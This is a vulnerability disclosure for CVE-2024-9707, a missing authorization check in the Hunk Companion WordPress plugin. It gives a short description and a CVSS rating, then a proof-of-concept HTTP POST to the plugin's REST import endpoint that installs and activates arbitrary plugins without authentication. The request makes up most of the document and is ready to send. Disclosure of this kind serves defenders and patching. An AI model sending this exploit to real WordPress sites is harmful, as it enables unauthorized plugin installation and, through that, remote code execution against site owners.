# CVE-2024-9707
Hunk Companion &lt;= 1.8.4 - Missing Authorization to Unauthenticated Arbitrary Plugin Installation/Activation

# Description
The Hunk Companion plugin for WordPress is vulnerable to unauthorized plugin installation/activation due to a missing capability check on the /wp-json/hc/v1/themehunk-import REST API endpoint in all versions up to, and including, 1.8.4. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H	
Rating: Critical
CVVS score: 9.8
```

POC
---

```
POST /wp-json/hc/v1/themehunk-import HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/themes.php?page=themehunk-site-library&template=step
Content-Type: application/json
Content-Length: 2942
Origin: http://kubernetes.docker.internal
Connection: keep-alive

{
  "params": {
    "templateType": "free",
    "plugin": {
      "lead-form-builder": "Lead Form Builder",
      "woocommerce": "Woocommerce"
    },
    "allPlugins": [
      {
        "woocommerce": "woocommerce/woocommerce.php",
        "unlimited-blocks": "unlimited-blocks/unlimited-blocks.php",
        "elementor": "elementor/elementor.php",
        "pagelayer": "pagelayer/pagelayer.php",
        "brizy": "brizy/brizy.php",
        "megamenu": "megamenu/megamenu.php",
        "wc-multivendor-membership": "wc-multivendor-membership/wc-multivendor-membership.php",
        "wc-multivendor-marketplace": "wc-multivendor-marketplace/wc-multivendor-marketplace.php",
        "wc-frontend-manager": "wc-frontend-manager/wc_frontend_manager.php",
        "getwid": "getwid/getwid.php",
        "th-advance-product-search": "th-advance-product-search/th-advance-product-search.php",
        "th-all-in-one-woo-cart": "th-all-in-one-woo-cart/th-all-in-one-woo-cart.php",
        "th-product-compare": "th-product-compare/th-product-compare.php",
        "beaver-builder-lite-version": "beaver-builder-lite-version/fl-builder.php",
        "contact-form-7": "contact-form-7/wp-contact-form-7.php",
        "lead-form-builder": "lead-form-builder/lead-form-builder.php",
        "wp-popup-builder": "wp-popup-builder/wp-popup-builder.php",
        "motopress-hotel-booking-lite": "motopress-hotel-booking-lite/motopress-hotel-booking.php",
        "real-estate-listing-realtyna-wpl": "real-estate-listing-realtyna-wpl/WPL.php",
        "bmi-calculator-shortcode": "bmi-calculator-shortcode/bmi-calculator-shortcode.php",
        "yith-woocommerce-wishlist": "yith-woocommerce-wishlist/init.php",
        "yith-woocommerce-compare": "yith-woocommerce-compare/init.php",
        "give": "give/give.php",
        "restaurant-cafe-addon-for-elementor": "restaurant-cafe-addon-for-elementor/restaurant-cafe-addon-for-elementor.php",
        "dokan-lite": "dokan-lite/dokan.php",
        "easy-appointments": "easy-appointments/main.php",
        "woocommerce-conversion-tracking": "woocommerce-conversion-tracking/conversion-tracking.php",
        "mage-eventpress": "mage-eventpress/woocommerce-event-press.php",
        "dc-woocommerce-multi-vendor": "dc-woocommerce-multi-vendor/dc_product_vendor.php",
        "affiliate-coupons": "affiliate-coupons/affiliate-coupons.php",
        "wemail": "wemail/wemail.php",
        "charitable": "charitable/charitable.php",
        "rencontre": "rencontre/rencontre.php",
        "easy-property-listings": "easy-property-listings/easy-property-listings.php",
        "ecalypse-rental-starter": "ecalypse-rental-starter/ecalypse-rental-starter.php",
        "cryptocurrency-price-ticker-widget": "cryptocurrency-price-ticker-widget/cryptocurrency-price-ticker-widget.php",
        "animentor-lottie-bodymovin-elementor": "animentor-lottie-bodymovin-elementor/animentor-lottie-bodymovin-elementor.php",
        "tickera-event-ticketing-system": "tickera-event-ticketing-system/tickera.php",
        "ymm-search": "ymm-search/ymm-search.php",
        "themehunk-customizer": "themehunk-customizer/themehunk-customizer.php",
        "hunk-companion": "hunk-companion/hunk-companion.php"
      }
    ],
    "builder": "gogo",
    "themeSlug": "gogo",
    "proThemePlugin": "hunk-companion",
    "tmplFreePro": "plugin",
    "wpUrl": "https://downloads.wordpress.org/",
    "thUrl": "https://themehunk.com/wp/data/"
  }
}
```
